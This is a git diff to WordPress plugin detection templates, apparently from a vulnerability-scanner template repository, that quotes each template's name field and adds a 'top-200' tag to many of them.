b/technologies/wordpress/wordpress-backwpup.yaml @@ -1,7 +1,7 @@ id: wordpress-backwpup info: - name: BackWPup – WordPress Backup Plugin Detection + name: "BackWPup – WordPress Backup Plugin Detection" author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: backwpup wpscan: https://wpscan.com/plugin/backwpup - tags: tech,wordpress,plugin,top-100 + tags: tech,wordpress,plugin,top-100,top-200 requests: - method: GET diff --git a/technologies/wordpress/wordpress-better-search-replace.yaml b/technologies/wordpress/wordpress-better-search-replace.yaml index 4df9d8d7f6..b4954c16a6 100644 --- a/technologies/wordpress/wordpress-better-search-replace.yaml +++ b/technologies/wordpress/wordpress-better-search-replace.yaml @@ -1,7 +1,7 @@ id: wordpress-better-search-replace info: - name: Better Search Replace Detection + name: "Better Search Replace Detection" author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: better-search-replace wpscan: https://wpscan.com/plugin/better-search-replace - tags: tech,wordpress,plugin,top-100 + tags: tech,wordpress,plugin,top-100,top-200 requests: - method: GET diff --git a/technologies/wordpress/wordpress-better-wp-security.yaml b/technologies/wordpress/wordpress-better-wp-security.yaml index 56c071fb76..ea58f7e389 100644 --- a/technologies/wordpress/wordpress-better-wp-security.yaml +++ b/technologies/wordpress/wordpress-better-wp-security.yaml @@ -1,7 +1,7 @@ id: wordpress-better-wp-security info: - name: iThemes Security Detection + name: "iThemes Security Detection" author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: better-wp-security wpscan: https://wpscan.com/plugin/better-wp-security - tags: tech,wordpress,plugin,top-100 + tags: tech,wordpress,plugin,top-100,top-200 requests: - method: GET diff --git a/technologies/wordpress/wordpress-black-studio-tinymce-widget.yaml b/technologies/wordpress/wordpress-black-studio-tinymce-widget.yaml index 2f7b3092c7..1a382879e4 100644 --- a/technologies/wordpress/wordpress-black-studio-tinymce-widget.yaml +++ b/technologies/wordpress/wordpress-black-studio-tinymce-widget.yaml @@ -1,7 +1,7 @@ id: wordpress-black-studio-tinymce-widget info: - name: Black Studio TinyMCE Widget Detection + name: "Black Studio TinyMCE Widget Detection" author: ricardomaia severity: info reference: diff --git a/technologies/wordpress/wordpress-breadcrumb-navxt.yaml b/technologies/wordpress/wordpress-breadcrumb-navxt.yaml index ce82706605..da196e9d09 100644 --- a/technologies/wordpress/wordpress-breadcrumb-navxt.yaml +++ b/technologies/wordpress/wordpress-breadcrumb-navxt.yaml @@ -1,7 +1,7 @@ id: wordpress-breadcrumb-navxt info: - name: Breadcrumb NavXT Detection + name: "Breadcrumb NavXT Detection" author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: breadcrumb-navxt wpscan: https://wpscan.com/plugin/breadcrumb-navxt - tags: tech,wordpress,plugin,top-100 + tags: tech,wordpress,plugin,top-100,top-200 requests: - method: GET diff --git a/technologies/wordpress/wordpress-broken-link-checker.yaml b/technologies/wordpress/wordpress-broken-link-checker.yaml index b988aa7b55..323db345da 100644 --- a/technologies/wordpress/wordpress-broken-link-checker.yaml +++ b/technologies/wordpress/wordpress-broken-link-checker.yaml @@ -1,7 +1,7 @@ id: wordpress-broken-link-checker info: - name: Broken Link Checker Detection + name: "Broken Link Checker Detection" author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: broken-link-checker wpscan: https://wpscan.com/plugin/broken-link-checker - tags: tech,wordpress,plugin,top-100 + tags: tech,wordpress,plugin,top-100,top-200 requests: - method: GET diff --git a/technologies/wordpress/wordpress-child-theme-configurator.yaml b/technologies/wordpress/wordpress-child-theme-configurator.yaml index b764640866..6e56d731d8 100644 --- a/technologies/wordpress/wordpress-child-theme-configurator.yaml +++ b/technologies/wordpress/wordpress-child-theme-configurator.yaml @@ -1,7 +1,7 @@ id: wordpress-child-theme-configurator info: - name: Child Theme Configurator Detection + name: "Child Theme Configurator Detection" author: ricardomaia severity: info reference: diff --git a/technologies/wordpress/wordpress-classic-editor.yaml b/technologies/wordpress/wordpress-classic-editor.yaml index 686c11dfc7..2b006bb874 100644 --- a/technologies/wordpress/wordpress-classic-editor.yaml +++ b/technologies/wordpress/wordpress-classic-editor.yaml @@ -1,7 +1,7 @@ id: wordpress-classic-editor info: - name: Classic Editor Detection + name: "Classic Editor Detection" author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: classic-editor wpscan: https://wpscan.com/plugin/classic-editor - tags: tech,wordpress,plugin,top-100 + tags: tech,wordpress,plugin,top-100,top-200 requests: - method: GET diff --git a/technologies/wordpress/wordpress-classic-widgets.yaml b/technologies/wordpress/wordpress-classic-widgets.yaml index 8ca637ce6d..8a361a8adc 100644 --- a/technologies/wordpress/wordpress-classic-widgets.yaml +++ b/technologies/wordpress/wordpress-classic-widgets.yaml @@ -1,7 +1,7 @@ id: wordpress-classic-widgets info: - name: Classic Widgets Detection + name: "Classic Widgets Detection" author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: classic-widgets wpscan: https://wpscan.com/plugin/classic-widgets - tags: tech,wordpress,plugin,top-100 + tags: tech,wordpress,plugin,top-100,top-200 requests: - method: GET diff --git a/technologies/wordpress/wordpress-click-to-chat-for-whatsapp.yaml b/technologies/wordpress/wordpress-click-to-chat-for-whatsapp.yaml index 030aa4fb01..f330d8e9eb 100644 --- a/technologies/wordpress/wordpress-click-to-chat-for-whatsapp.yaml +++ b/technologies/wordpress/wordpress-click-to-chat-for-whatsapp.yaml @@ -1,7 +1,7 @@ id: wordpress-click-to-chat-for-whatsapp info: - name: Click to Chat Detection + name: "Click to Chat Detection" author: ricardomaia severity: info reference: diff --git a/technologies/wordpress/wordpress-cloudflare.yaml b/technologies/wordpress/wordpress-cloudflare.yaml index 1a3b327d5f..be6d0e9fd6 100644 --- a/technologies/wordpress/wordpress-cloudflare.yaml +++ b/technologies/wordpress/wordpress-cloudflare.yaml @@ -1,7 +1,7 @@ id: wordpress-cloudflare info: - name: Cloudflare Detection + name: "Cloudflare Detection" author: ricardomaia severity: info reference: diff --git a/technologies/wordpress/wordpress-cmb2.yaml b/technologies/wordpress/wordpress-cmb2.yaml index 62fca27118..a5e98325cb 100644 --- a/technologies/wordpress/wordpress-cmb2.yaml +++ b/technologies/wordpress/wordpress-cmb2.yaml @@ -1,7 +1,7 @@ id: wordpress-cmb2 info: - name: CMB2 Detection + name: "CMB2 Detection" author: ricardomaia severity: info reference: diff --git a/technologies/wordpress/wordpress-coblocks.yaml b/technologies/wordpress/wordpress-coblocks.yaml index 2df3683134..fc3d8fd905 100644 --- a/technologies/wordpress/wordpress-coblocks.yaml +++ b/technologies/wordpress/wordpress-coblocks.yaml @@ -1,7 +1,7 @@ id: wordpress-coblocks info: - name: Page Builder Gutenberg Blocks – CoBlocks Detection + name: "Page Builder Gutenberg Blocks – CoBlocks Detection" author: ricardomaia severity: info reference: diff --git a/technologies/wordpress/wordpress-code-snippets.yaml b/technologies/wordpress/wordpress-code-snippets.yaml index 0e915dc410..7986f1a30f 100644 --- a/technologies/wordpress/wordpress-code-snippets.yaml +++ b/technologies/wordpress/wordpress-code-snippets.yaml @@ -1,7 +1,7 @@ id: wordpress-code-snippets info: - name: Code Snippets Detection + name: "Code Snippets Detection" author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: code-snippets wpscan: https://wpscan.com/plugin/code-snippets - tags: tech,wordpress,plugin,top-100 + tags: tech,wordpress,plugin,top-100,top-200 requests: - method: GET diff --git a/technologies/wordpress/wordpress-coming-soon.yaml b/technologies/wordpress/wordpress-coming-soon.yaml index 2fe22a7e8a..aa34845b98 100644 --- a/technologies/wordpress/wordpress-coming-soon.yaml +++ b/technologies/wordpress/wordpress-coming-soon.yaml @@ -1,7 +1,7 @@ id: wordpress-coming-soon info: - name: Website Builder by SeedProd — Theme Builder, Landing Page Builder, Coming Soon Page, Maintenance Mode Detection + name: "Website Builder by SeedProd — Theme Builder, Landing Page Builder, Coming Soon Page, Maintenance Mode Detection" author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: coming-soon wpscan: https://wpscan.com/plugin/coming-soon - tags: tech,wordpress,plugin,top-100 + tags: tech,wordpress,plugin,top-100,top-200 requests: - method: GET diff --git a/technologies/wordpress/wordpress-complianz-gdpr.yaml b/technologies/wordpress/wordpress-complianz-gdpr.yaml index 6d1a7046a6..28b63c244b 100644 --- a/technologies/wordpress/wordpress-complianz-gdpr.yaml +++ b/technologies/wordpress/wordpress-complianz-gdpr.yaml @@ -1,7 +1,7 @@ id: wordpress-complianz-gdpr info: - name: Complianz – GDPR/CCPA Cookie Consent Detection + name: "Complianz – GDPR/CCPA Cookie Consent Detection" author: ricardomaia severity: info reference: diff --git a/technologies/wordpress/wordpress-contact-form-7-honeypot.yaml b/technologies/wordpress/wordpress-contact-form-7-honeypot.yaml index 076c47e6e2..09780bdb5d 100644 --- a/technologies/wordpress/wordpress-contact-form-7-honeypot.yaml +++ b/technologies/wordpress/wordpress-contact-form-7-honeypot.yaml @@ -1,7 +1,7 @@ id: wordpress-contact-form-7-honeypot info: - name: Honeypot for Contact Form 7 Detection + name: "Honeypot for Contact Form 7 Detection" author: ricardomaia severity: info reference: diff --git a/technologies/wordpress/wordpress-contact-form-7.yaml b/technologies/wordpress/wordpress-contact-form-7.yaml index 67618ffbc5..e021cba23b 100644 --- a/technologies/wordpress/wordpress-contact-form-7.yaml +++ b/technologies/wordpress/wordpress-contact-form-7.yaml @@ -1,7 +1,7 @@ id: wordpress-contact-form-7 info: - name: Contact Form 7 Detection + name: "Contact Form 7 Detection" author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: contact-form-7 wpscan: https://wpscan.com/plugin/contact-form-7 - tags: tech,wordpress,plugin,top-100 + tags: tech,wordpress,plugin,top-100,top-200 requests: - method: GET diff --git a/technologies/wordpress/wordpress-contact-form-cfdb7.yaml b/technologies/wordpress/wordpress-contact-form-cfdb7.yaml index 10df2b040e..e798a8a28d 100644 --- a/technologies/wordpress/wordpress-contact-form-cfdb7.yaml +++ b/technologies/wordpress/wordpress-contact-form-cfdb7.yaml @@ -1,7 +1,7 @@ id: wordpress-contact-form-cfdb7 info: - name: Contact Form 7 Database Addon – CFDB7 Detection + name: "Contact Form 7 Database Addon – CFDB7 Detection" author: ricardomaia severity: info reference: diff --git a/technologies/wordpress/wordpress-cookie-law-info.yaml b/technologies/wordpress/wordpress-cookie-law-info.yaml index b5ba814447..794db8d91d 100644 --- a/technologies/wordpress/wordpress-cookie-law-info.yaml +++ b/technologies/wordpress/wordpress-cookie-law-info.yaml @@ -1,7 +1,7 @@ id: wordpress-cookie-law-info info: - name: CookieYes | GDPR Cookie Consent & Compliance Notice (CCPA Ready) Detection + name: "CookieYes | GDPR Cookie Consent & Compliance Notice (CCPA Ready) Detection" author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: cookie-law-info wpscan: https://wpscan.com/plugin/cookie-law-info - tags: tech,wordpress,plugin,top-100 + tags: tech,wordpress,plugin,top-100,top-200 requests: - method: GET diff --git a/technologies/wordpress/wordpress-cookie-notice.yaml b/technologies/wordpress/wordpress-cookie-notice.yaml index f70e2f871b..001b762c70 100644 --- a/technologies/wordpress/wordpress-cookie-notice.yaml +++ b/technologies/wordpress/wordpress-cookie-notice.yaml @@ -1,7 +1,7 @@ id: wordpress-cookie-notice info: - name: Cookie Notice & Compliance for GDPR / CCPA Detection + name: "Cookie Notice & Compliance for GDPR / CCPA Detection" author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: cookie-notice wpscan: https://wpscan.com/plugin/cookie-notice - tags: tech,wordpress,plugin,top-100 + tags: tech,wordpress,plugin,top-100,top-200 requests: - method: GET diff --git a/technologies/wordpress/wordpress-creame-whatsapp-me.yaml b/technologies/wordpress/wordpress-creame-whatsapp-me.yaml index 61a4b52899..f6a67bfe4f 100644 --- a/technologies/wordpress/wordpress-creame-whatsapp-me.yaml +++ b/technologies/wordpress/wordpress-creame-whatsapp-me.yaml @@ -1,7 +1,7 @@ id: wordpress-creame-whatsapp-me info: - name: Joinchat Detection + name: "Joinchat Detection" author: ricardomaia severity: info reference: diff --git a/technologies/wordpress/wordpress-creative-mail-by-constant-contact.yaml b/technologies/wordpress/wordpress-creative-mail-by-constant-contact.yaml index 9f3d95c82f..2b135c2cc8 100644 --- a/technologies/wordpress/wordpress-creative-mail-by-constant-contact.yaml +++ b/technologies/wordpress/wordpress-creative-mail-by-constant-contact.yaml @@ -1,7 +1,7 @@ id: wordpress-creative-mail-by-constant-contact info: - name: Creative Mail – Easier WordPress & WooCommerce Email Marketing Detection + name: "Creative Mail – Easier WordPress & WooCommerce Email Marketing Detection" author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: creative-mail-by-constant-contact wpscan: https://wpscan.com/plugin/creative-mail-by-constant-contact - tags: tech,wordpress,plugin,top-100 + tags: tech,wordpress,plugin,top-100,top-200 requests: - method: GET diff --git a/technologies/wordpress/wordpress-custom-css-js.yaml b/technologies/wordpress/wordpress-custom-css-js.yaml index 8c3a95a2a0..a804d55c34 100644 --- a/technologies/wordpress/wordpress-custom-css-js.yaml +++ b/technologies/wordpress/wordpress-custom-css-js.yaml @@ -1,7 +1,7 @@ id: wordpress-custom-css-js info: - name: Simple Custom CSS and JS Detection + name: "Simple Custom CSS and JS Detection" author: ricardomaia severity: info reference: diff --git a/technologies/wordpress/wordpress-custom-fonts.yaml b/technologies/wordpress/wordpress-custom-fonts.yaml index 25938d2f50..f4bff499b8 100644 --- a/technologies/wordpress/wordpress-custom-fonts.yaml +++ b/technologies/wordpress/wordpress-custom-fonts.yaml @@ -1,7 +1,7 @@ id: wordpress-custom-fonts info: - name: Custom Fonts Detection + name: "Custom Fonts Detection" author: ricardomaia severity: info reference: diff --git a/technologies/wordpress/wordpress-custom-post-type-ui.yaml b/technologies/wordpress/wordpress-custom-post-type-ui.yaml index 62d2b194c6..4b4db2b394 100644 --- a/technologies/wordpress/wordpress-custom-post-type-ui.yaml +++ b/technologies/wordpress/wordpress-custom-post-type-ui.yaml @@ -1,7 +1,7 @@ id: wordpress-custom-post-type-ui info: - name: Custom Post Type UI Detection + name: "Custom Post Type UI Detection" author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: custom-post-type-ui wpscan: https://wpscan.com/plugin/custom-post-type-ui - tags: tech,wordpress,plugin,top-100 + tags: tech,wordpress,plugin,top-100,top-200 requests: - method: GET diff --git a/technologies/wordpress/wordpress-disable-comments.yaml b/technologies/wordpress/wordpress-disable-comments.yaml index f14beeb403..5563da7cda 100644 --- a/technologies/wordpress/wordpress-disable-comments.yaml +++ b/technologies/wordpress/wordpress-disable-comments.yaml @@ -1,7 +1,7 @@ id: wordpress-disable-comments info: - name: Disable Comments – Remove Comments & Stop Spam [Multi-Site Support] Detection + name: "Disable Comments – Remove Comments & Stop Spam [Multi-Site Support] Detection" author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: disable-comments wpscan: https://wpscan.com/plugin/disable-comments - tags: tech,wordpress,plugin,top-100 + tags: tech,wordpress,plugin,top-100,top-200 requests: - method: GET diff --git a/technologies/wordpress/wordpress-disable-gutenberg.yaml b/technologies/wordpress/wordpress-disable-gutenberg.yaml index d1b5c670e8..43459bd9ea 100644 --- a/technologies/wordpress/wordpress-disable-gutenberg.yaml +++ b/technologies/wordpress/wordpress-disable-gutenberg.yaml @@ -1,7 +1,7 @@ id: wordpress-disable-gutenberg info: - name: Disable Gutenberg Detection + name: "Disable Gutenberg Detection" author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: disable-gutenberg wpscan: https://wpscan.com/plugin/disable-gutenberg - tags: tech,wordpress,plugin,top-100 + tags: tech,wordpress,plugin,top-100,top-200 requests: - method: GET diff --git a/technologies/wordpress/wordpress-duplicate-page.yaml b/technologies/wordpress/wordpress-duplicate-page.yaml index ecb58b6d64..852b30bd15 100644 --- a/technologies/wordpress/wordpress-duplicate-page.yaml +++ b/technologies/wordpress/wordpress-duplicate-page.yaml @@ -1,7 +1,7 @@ id: wordpress-duplicate-page info: - name: Duplicate Page Detection + name: "Duplicate Page Detection" author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: duplicate-page wpscan: https://wpscan.com/plugin/duplicate-page - tags: tech,wordpress,plugin,top-100 + tags: tech,wordpress,plugin,top-100,top-200 requests: - method: GET diff --git a/technologies/wordpress/wordpress-duplicate-post.yaml b/technologies/wordpress/wordpress-duplicate-post.yaml index e485fb9e89..d550f47e9f 100644 --- a/technologies/wordpress/wordpress-duplicate-post.yaml +++ b/technologies/wordpress/wordpress-duplicate-post.yaml @@ -1,7 +1,7 @@ id: wordpress-duplicate-post info: - name: Yoast Duplicate Post Detection + name: "Yoast Duplicate Post Detection" author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: duplicate-post wpscan: https://wpscan.com/plugin/duplicate-post - tags: tech,wordpress,plugin,top-100 + tags: tech,wordpress,plugin,top-100,top-200 requests: - method: GET diff --git a/technologies/wordpress/wordpress-duplicator.yaml b/technologies/wordpress/wordpress-duplicator.yaml index 83a2c36545..418657ee5b 100644 --- a/technologies/wordpress/wordpress-duplicator.yaml +++ b/technologies/wordpress/wordpress-duplicator.yaml @@ -1,7 +1,7 @@ id: wordpress-duplicator info: - name: Duplicator – WordPress Migration Plugin Detection + name: "Duplicator – WordPress Migration Plugin Detection" author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: duplicator wpscan: https://wpscan.com/plugin/duplicator - tags: tech,wordpress,plugin,top-100 + tags: tech,wordpress,plugin,top-100,top-200 requests: - method: GET diff --git a/technologies/wordpress/wordpress-duracelltomi-google-tag-manager.yaml b/technologies/wordpress/wordpress-duracelltomi-google-tag-manager.yaml index 2c941a2ea0..b62367fd0b 100644 --- a/technologies/wordpress/wordpress-duracelltomi-google-tag-manager.yaml +++ b/technologies/wordpress/wordpress-duracelltomi-google-tag-manager.yaml @@ -1,7 +1,7 @@ id: wordpress-duracelltomi-google-tag-manager info: - name: GTM4WP Detection + name: "GTM4WP Detection" author: ricardomaia severity: info reference: diff --git a/technologies/wordpress/wordpress-easy-fancybox.yaml b/technologies/wordpress/wordpress-easy-fancybox.yaml index 80f699863d..ae63260f92 100644 --- a/technologies/wordpress/wordpress-easy-fancybox.yaml +++ b/technologies/wordpress/wordpress-easy-fancybox.yaml @@ -1,7 +1,7 @@ id: wordpress-easy-fancybox info: - name: Easy FancyBox Detection + name: "Easy FancyBox Detection" author: ricardomaia severity: info reference: diff --git a/technologies/wordpress/wordpress-easy-google-fonts.yaml b/technologies/wordpress/wordpress-easy-google-fonts.yaml index ceb8d5bfd7..0500b69896 100644 --- a/technologies/wordpress/wordpress-easy-google-fonts.yaml +++ b/technologies/wordpress/wordpress-easy-google-fonts.yaml @@ -1,7 +1,7 @@ id: wordpress-easy-google-fonts info: - name: Easy Google Fonts Detection + name: "Easy Google Fonts Detection" author: ricardomaia severity: info reference: diff --git a/technologies/wordpress/wordpress-easy-table-of-contents.yaml b/technologies/wordpress/wordpress-easy-table-of-contents.yaml index 1ff4066ab8..9817008575 100644 --- a/technologies/wordpress/wordpress-easy-table-of-contents.yaml +++ b/technologies/wordpress/wordpress-easy-table-of-contents.yaml @@ -1,7 +1,7 @@ id: wordpress-easy-table-of-contents info: - name: Easy Table of Contents Detection + name: "Easy Table of Contents Detection" author: ricardomaia severity: info reference: diff --git a/technologies/wordpress/wordpress-easy-wp-smtp.yaml b/technologies/wordpress/wordpress-easy-wp-smtp.yaml index 13243444af..50d8458b4a 100644 --- a/technologies/wordpress/wordpress-easy-wp-smtp.yaml +++ b/technologies/wordpress/wordpress-easy-wp-smtp.yaml @@ -1,7 +1,7 @@ id: wordpress-easy-wp-smtp info: - name: Easy WP SMTP Detection + name: "Easy WP SMTP Detection" author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: easy-wp-smtp wpscan: https://wpscan.com/plugin/easy-wp-smtp - tags: tech,wordpress,plugin,top-100 + tags: tech,wordpress,plugin,top-100,top-200 requests: - method: GET diff --git a/technologies/wordpress/wordpress-elementor.yaml b/technologies/wordpress/wordpress-elementor.yaml index e387d6f34d..950aaf6d4f 100644 --- a/technologies/wordpress/wordpress-elementor.yaml +++ b/technologies/wordpress/wordpress-elementor.yaml @@ -1,7 +1,7 @@ id: wordpress-elementor info: - name: Elementor Website Builder Detection + name: "Elementor Website Builder Detection" author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: elementor wpscan: https://wpscan.com/plugin/elementor - tags: tech,wordpress,plugin,top-100 + tags: tech,wordpress,plugin,top-100,top-200 requests: - method: GET diff --git a/technologies/wordpress/wordpress-elementskit-lite.yaml b/technologies/wordpress/wordpress-elementskit-lite.yaml index 4428d10603..ba1a10a63a 100644 --- a/technologies/wordpress/wordpress-elementskit-lite.yaml +++ b/technologies/wordpress/wordpress-elementskit-lite.yaml @@ -1,7 +1,7 @@ id: wordpress-elementskit-lite info: - name: ElementsKit Elementor addons (Header Footer Builder, Mega Menu Builder, Free Elementor Widgets & Elementor Templates Library) Detection + name: "ElementsKit Elementor addons (Header Footer Builder, Mega Menu Builder, Free Elementor Widgets & Elementor Templates Library) Detection" author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: elementskit-lite wpscan: https://wpscan.com/plugin/elementskit-lite - tags: tech,wordpress,plugin,top-100 + tags: tech,wordpress,plugin,top-100,top-200 requests: - method: GET diff --git a/technologies/wordpress/wordpress-enable-media-replace.yaml b/technologies/wordpress/wordpress-enable-media-replace.yaml index 95f8e6d92b..d944c72038 100644 --- a/technologies/wordpress/wordpress-enable-media-replace.yaml +++ b/technologies/wordpress/wordpress-enable-media-replace.yaml @@ -1,7 +1,7 @@ id: wordpress-enable-media-replace info: - name: Enable Media Replace Detection + name: "Enable Media Replace Detection" author: ricardomaia severity: info reference: diff --git a/technologies/wordpress/wordpress-envato-elements.yaml b/technologies/wordpress/wordpress-envato-elements.yaml index 8e7f60a3f7..f9c13ef8da 100644 --- a/technologies/wordpress/wordpress-envato-elements.yaml +++ b/technologies/wordpress/wordpress-envato-elements.yaml @@ -1,7 +1,7 @@ id: wordpress-envato-elements info: - name: Envato Elements – Photos & Elementor Templates Detection + name: "Envato Elements – Photos & Elementor Templates Detection" author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: envato-elements wpscan: https://wpscan.com/plugin/envato-elements - tags: tech,wordpress,plugin,top-100 + tags: tech,wordpress,plugin,top-100,top-200 requests: - method: GET diff --git a/technologies/wordpress/wordpress-essential-addons-for-elementor-lite.yaml b/technologies/wordpress/wordpress-essential-addons-for-elementor-lite.yaml index 1ab812b653..45445be633 100644 --- a/technologies/wordpress/wordpress-essential-addons-for-elementor-lite.yaml +++ b/technologies/wordpress/wordpress-essential-addons-for-elementor-lite.yaml @@ -1,7 +1,7 @@ id: wordpress-essential-addons-for-elementor-lite info: - name: Essential Addons for Elementor Detection + name: "Essential Addons for Elementor Detection" author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: essential-addons-for-elementor-lite wpscan: https://wpscan.com/plugin/essential-addons-for-elementor-lite - tags: tech,wordpress,plugin,top-100 + tags: tech,wordpress,plugin,top-100,top-200 requests: - method: GET diff --git a/technologies/wordpress/wordpress-ewww-image-optimizer.yaml b/technologies/wordpress/wordpress-ewww-image-optimizer.yaml index 178364595f..60ab568f7e 100644 --- a/technologies/wordpress/wordpress-ewww-image-optimizer.yaml +++ b/technologies/wordpress/wordpress-ewww-image-optimizer.yaml @@ -1,7 +1,7 @@ id: wordpress-ewww-image-optimizer info: - name: EWWW Image Optimizer Detection + name: "EWWW Image Optimizer Detection" author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: ewww-image-optimizer wpscan: https://wpscan.com/plugin/ewww-image-optimizer - tags: tech,wordpress,plugin,top-100 + tags: tech,wordpress,plugin,top-100,top-200 requests: - method: GET diff --git a/technologies/wordpress/wordpress-facebook-for-woocommerce.yaml b/technologies/wordpress/wordpress-facebook-for-woocommerce.yaml index 868ee5f52a..60e81609dd 100644 --- a/technologies/wordpress/wordpress-facebook-for-woocommerce.yaml +++ b/technologies/wordpress/wordpress-facebook-for-woocommerce.yaml @@ -1,7 +1,7 @@ id: wordpress-facebook-for-woocommerce info: - name: Facebook for WooCommerce Detection + name: "Facebook for WooCommerce Detection" author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: facebook-for-woocommerce wpscan: https://wpscan.com/plugin/facebook-for-woocommerce - tags: tech,wordpress,plugin,top-100 + tags: tech,wordpress,plugin,top-100,top-200 requests: - method: GET diff --git a/technologies/wordpress/wordpress-favicon-by-realfavicongenerator.yaml b/technologies/wordpress/wordpress-favicon-by-realfavicongenerator.yaml index e95d592ec2..72611070dc 100644 --- a/technologies/wordpress/wordpress-favicon-by-realfavicongenerator.yaml +++ b/technologies/wordpress/wordpress-favicon-by-realfavicongenerator.yaml @@ -1,7 +1,7 @@ id: wordpress-favicon-by-realfavicongenerator info: - name: Favicon by RealFaviconGenerator Detection + name: "Favicon by RealFaviconGenerator Detection" author: ricardomaia severity: info reference: diff --git a/technologies/wordpress/wordpress-flamingo.yaml b/technologies/wordpress/wordpress-flamingo.yaml index 64ce97eee8..d447daac76 100644 --- a/technologies/wordpress/wordpress-flamingo.yaml +++ b/technologies/wordpress/wordpress-flamingo.yaml @@ -1,7 +1,7 @@ id: wordpress-flamingo info: - name: Flamingo Detection + name: "Flamingo Detection" author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: flamingo wpscan: https://wpscan.com/plugin/flamingo - tags: tech,wordpress,plugin,top-100 + tags: tech,wordpress,plugin,top-100,top-200 requests: - method: GET diff --git a/technologies/wordpress/wordpress-fluentform.yaml b/technologies/wordpress/wordpress-fluentform.yaml index c26811de72..93bef0d288 100644 --- a/technologies/wordpress/wordpress-fluentform.yaml +++ b/technologies/wordpress/wordpress-fluentform.yaml @@ -1,7 +1,7 @@ id: wordpress-fluentform info: - name: Contact Form Plugin – Fastest Contact Form Builder Plugin for WordPress by Fluent Forms Detection + name: "Contact Form Plugin – Fastest Contact Form Builder Plugin for WordPress by Fluent Forms Detection" author: ricardomaia severity: info reference: diff --git a/technologies/wordpress/wordpress-font-awesome.yaml b/technologies/wordpress/wordpress-font-awesome.yaml index 03391a8f3e..b7b218b3f8 100644 --- a/technologies/wordpress/wordpress-font-awesome.yaml +++ b/technologies/wordpress/wordpress-font-awesome.yaml @@ -1,7 +1,7 @@ id: wordpress-font-awesome info: - name: Font Awesome Detection + name: "Font Awesome Detection" author: ricardomaia severity: info reference: diff --git a/technologies/wordpress/wordpress-force-regenerate-thumbnails.yaml b/technologies/wordpress/wordpress-force-regenerate-thumbnails.yaml index 80beef5ef4..828ca52c58 100644 --- a/technologies/wordpress/wordpress-force-regenerate-thumbnails.yaml +++ b/technologies/wordpress/wordpress-force-regenerate-thumbnails.yaml @@ -1,7 +1,7 @@ id: wordpress-force-regenerate-thumbnails info: - name: Force Regenerate Thumbnails Detection + name: "Force Regenerate Thumbnails Detection" author: ricardomaia severity: info reference: diff --git a/technologies/wordpress/wordpress-formidable.yaml b/technologies/wordpress/wordpress-formidable.yaml index 912c8cfb4b..83eb75fc06 100644 --- a/technologies/wordpress/wordpress-formidable.yaml +++ b/technologies/wordpress/wordpress-formidable.yaml @@ -1,7 +1,7 @@ id: wordpress-formidable info: - name: Formidable Forms – Contact Form, Survey, Quiz, Calculator & Custom Form Builder Detection + name: "Formidable Forms – Contact Form, Survey, Quiz, Calculator & Custom Form Builder Detection" author: ricardomaia severity: info reference: diff --git a/technologies/wordpress/wordpress-forminator.yaml b/technologies/wordpress/wordpress-forminator.yaml index 6076a0b75f..81ae12c470 100644 --- a/technologies/wordpress/wordpress-forminator.yaml +++ b/technologies/wordpress/wordpress-forminator.yaml @@ -1,7 +1,7 @@ id: wordpress-forminator info: - name: Forminator – Contact Form, Payment Form & Custom Form Builder Detection + name: "Forminator – Contact Form, Payment Form & Custom Form Builder Detection" author: ricardomaia severity: info reference: diff --git a/technologies/wordpress/wordpress-ga-google-analytics.yaml b/technologies/wordpress/wordpress-ga-google-analytics.yaml index 645da5eb5c..1543f6e734 100644 --- a/technologies/wordpress/wordpress-ga-google-analytics.yaml +++ b/technologies/wordpress/wordpress-ga-google-analytics.yaml @@ -1,7 +1,7 @@ id: wordpress-ga-google-analytics info: - name: GA Google Analytics Detection + name: "GA Google Analytics Detection" author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: ga-google-analytics wpscan: https://wpscan.com/plugin/ga-google-analytics - tags: tech,wordpress,plugin,top-100 + tags: tech,wordpress,plugin,top-100,top-200 requests: - method: GET diff --git a/technologies/wordpress/wordpress-google-analytics-dashboard-for-wp.yaml b/technologies/wordpress/wordpress-google-analytics-dashboard-for-wp.yaml index 42d2f8d957..d9570c2fb6 100644 --- a/technologies/wordpress/wordpress-google-analytics-dashboard-for-wp.yaml +++ b/technologies/wordpress/wordpress-google-analytics-dashboard-for-wp.yaml @@ -1,7 +1,7 @@ id: wordpress-google-analytics-dashboard-for-wp info: - name: 